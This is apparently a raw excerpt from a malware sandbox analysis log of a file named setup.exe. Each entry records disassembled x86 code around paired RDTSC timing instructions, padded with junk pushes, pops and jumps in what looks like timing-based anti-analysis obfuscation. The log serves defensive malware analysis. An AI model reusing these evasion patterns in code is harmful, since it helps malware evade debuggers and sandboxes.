Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D558 second address: E3D574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7208h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D6C8 second address: E3D6CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D6CD second address: E3D6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FF32CFB71FEh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push edx 0x00000013 jg 00007FF32CFB71FCh 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D8EF second address: E3D8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D8F3 second address: E3D8F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D8F7 second address: E3D8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D8FD second address: E3D903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D903 second address: E3D915 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FF32CDD6566h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3D915 second address: E3D95E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FF32CFB71F8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 push 00000004h 0x00000028 mov cl, 70h 0x0000002a push eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FF32CFB7202h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3DD0F second address: E3DD19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FF32CDD6566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3DD19 second address: E3DD4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7200h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 0000001Eh 0x00000010 sub dword ptr [ebp+122D32D8h], ecx 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF32CFB7201h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E72042 second address: E72051 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E7729E second address: E772BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7209h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E772BD second address: E772DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007FF32CDD6574h 0x0000000b jo 00007FF32CDD6566h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E772DE second address: E772E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E77EEC second address: E77EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E77EF0 second address: E77EF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E77EF4 second address: E77EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E77EFA second address: E77F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E77F00 second address: E77F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E780A1 second address: E780AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E780AF second address: E780B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E780B5 second address: E780B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E780B9 second address: E780D3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF32CDD656Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E780D3 second address: E780EF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FF32CFB71FDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jnc 00007FF32CFB71F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E7853D second address: E78550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD656Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E78550 second address: E7858B instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CFB71F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF32CFB7200h 0x00000012 jne 00007FF32CFB7208h 0x00000018 jmp 00007FF32CFB7202h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E7B8CA second address: E7B8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E829ED second address: E82A04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E82A04 second address: E82A10 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF32CDD656Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E82A10 second address: E82A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E82A18 second address: E82A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E82A1E second address: E82A28 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF32CFB71F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8145C second address: E81477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6575h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E81739 second address: E8173D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E81CE2 second address: E81CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E81CE8 second address: E81CF8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF32CFB71F6h 0x00000008 js 00007FF32CFB71F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E81FC0 second address: E81FCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E81FCF second address: E81FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FF32CFB71FEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E82416 second address: E8241A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8241A second address: E8243A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7207h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8243A second address: E82440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8118A second address: E811A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7202h 0x00000007 jnp 00007FF32CFB71F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E811A6 second address: E811C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6576h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8A458 second address: E8A45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E89D1D second address: E89D52 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF32CDD6576h 0x00000008 jmp 00007FF32CDD656Dh 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF32CDD656Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E89D52 second address: E89D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E89E84 second address: E89EBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF32CDD6574h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF32CDD6574h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jbe 00007FF32CDD6566h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E89EBE second address: E89EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E89EC4 second address: E89EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF32CDD6576h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8A03A second address: E8A040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8A040 second address: E8A051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FF32CDD6566h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8A051 second address: E8A055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8CB32 second address: E8CB51 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF32CDD6566h 0x00000008 jg 00007FF32CDD6566h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FF32CDD656Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8CB51 second address: E8CB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E8CB58 second address: E8CB74 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CDD656Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FF32CDD6568h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E93115 second address: E9311F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF32CFB71FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9311F second address: E93128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E93558 second address: E93581 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF32CFB71F6h 0x00000008 jmp 00007FF32CFB7206h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jp 00007FF32CFB71F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E936B4 second address: E936BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3DBB0 second address: E3DC30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jno 00007FF32CFB720Dh 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FF32CFB71F8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b movsx ecx, cx 0x0000002e push 00000004h 0x00000030 mov edi, dword ptr [ebp+122D3394h] 0x00000036 nop 0x00000037 push edi 0x00000038 jmp 00007FF32CFB7201h 0x0000003d pop edi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF32CFB7203h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E3DC30 second address: E3DC36 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E93959 second address: E93963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF32CFB71F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E93963 second address: E93983 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF32CDD6570h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FF32CDD6566h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E93983 second address: E93997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c jnp 00007FF32CFB71F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E97E38 second address: E97E3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E97E3C second address: E97E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF32CFB7201h 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 jmp 00007FF32CFB71FAh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 jno 00007FF32CFB71F6h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E97E75 second address: E97E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007FF32CDD6566h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E982B4 second address: E982CC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FF32CFB71FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E982CC second address: E982D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9844F second address: E98466 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E98466 second address: E98472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FF32CDD6566h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E98795 second address: E98799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9BD2C second address: E9BD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF32CDD6566h 0x0000000a jmp 00007FF32CDD656Dh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9B534 second address: E9B53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9B53A second address: E9B55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FF32CDD6579h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9B7CC second address: E9B7F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007FF32CFB7204h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9B7F0 second address: E9B7FE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 jp 00007FF32CDD656Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9BA74 second address: E9BA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA2DAA second address: EA2DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD656Bh 0x00000009 jmp 00007FF32CDD656Bh 0x0000000e jmp 00007FF32CDD6576h 0x00000013 popad 0x00000014 jmp 00007FF32CDD6575h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA2DF0 second address: EA2DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA2FAE second address: EA2FB8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD656Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA33C0 second address: EA33C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA33C4 second address: EA33E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF32CDD6571h 0x0000000d js 00007FF32CDD6566h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA33E3 second address: EA33F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA33F4 second address: EA3412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6578h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA3412 second address: EA3423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF32CFB71FAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA36C9 second address: EA36CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA36CD second address: EA36EE instructions: 0x00000000 rdtsc 0x00000002 js 00007FF32CFB71F6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FF32CFB7203h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA36EE second address: EA36F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA36F5 second address: EA3718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB71FDh 0x00000009 jne 00007FF32CFB71F6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 jl 00007FF32CFB71FEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA3F66 second address: EA3F9D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6568h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jng 00007FF32CDD6566h 0x00000015 jmp 00007FF32CDD656Eh 0x0000001a push eax 0x0000001b pop eax 0x0000001c popad 0x0000001d jmp 00007FF32CDD6571h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA4810 second address: EA4820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FF32CFB71FAh 0x0000000c rdtsc
